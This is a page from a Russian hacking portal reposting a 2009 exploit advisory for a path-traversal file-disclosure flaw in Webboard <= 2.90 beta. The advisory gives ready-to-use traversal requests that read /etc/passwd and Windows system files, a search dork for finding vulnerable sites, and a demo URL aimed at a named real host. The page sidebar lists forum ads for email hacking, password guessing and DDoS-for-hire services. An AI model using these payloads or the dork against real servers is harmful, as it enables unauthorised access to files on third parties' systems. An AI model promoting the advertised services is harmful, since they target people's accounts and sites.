Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Эксплойт (exploit) Webboard <= v.2.90 beta Remote File Disclosure Vulnerability Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Webboard &lt;= v.2.90 beta Remote File Disclosure Vulnerability

30.05.2009


Webboard <= v.2.90 beta Remote File Disclosure Vulnerability

=============================================================

Author: MrDoug
Email: mrdoug13 [at] gmail [dot] com

Greetz to all my friends

=============================================================

There are 3 vulnerable calls to fopen() in "/webboard/view.php"
They are on lines 7, 109 and 113.  I have not actually read the
source but based on tests I would GUESS they look something
like this...


  7: fopen('title/' . $_GET['topic'] . '.txt');

...

109: fopen('counter/read/' . $_GET['topic'] . '.txt');

...

113: fopen('counter/read/' . $_GET['topic'] . '.txt');


IMPORTANT:
Due to the trailing ".txt", retrieving files with different
extensions will be difficult unless you are able to get a
null byte through without it being escaped.

=============================================================

Example 1: /webboard/view.php?topic=../../../../../../etc/passwd\%00
Example 2: /webboard/view.php?topic=../../../../../../WINDOWS/system32/eula

Dork: inurl:"webboard/view.php?topic="

Demo: http://korat.nfe.go.th/ksn00/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula

# milw0rm.com [2009-05-29]
читать далее

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Unsorted
Опубликовал: ?
Просмотров: 5046
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Программирование / WEB Design » Уроки по JavaScript для начинающих
  • Разное / Ищу работу » Re: Прогон 7ым XRumerоm по форумам, блогам, гостевым. ru и e...
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}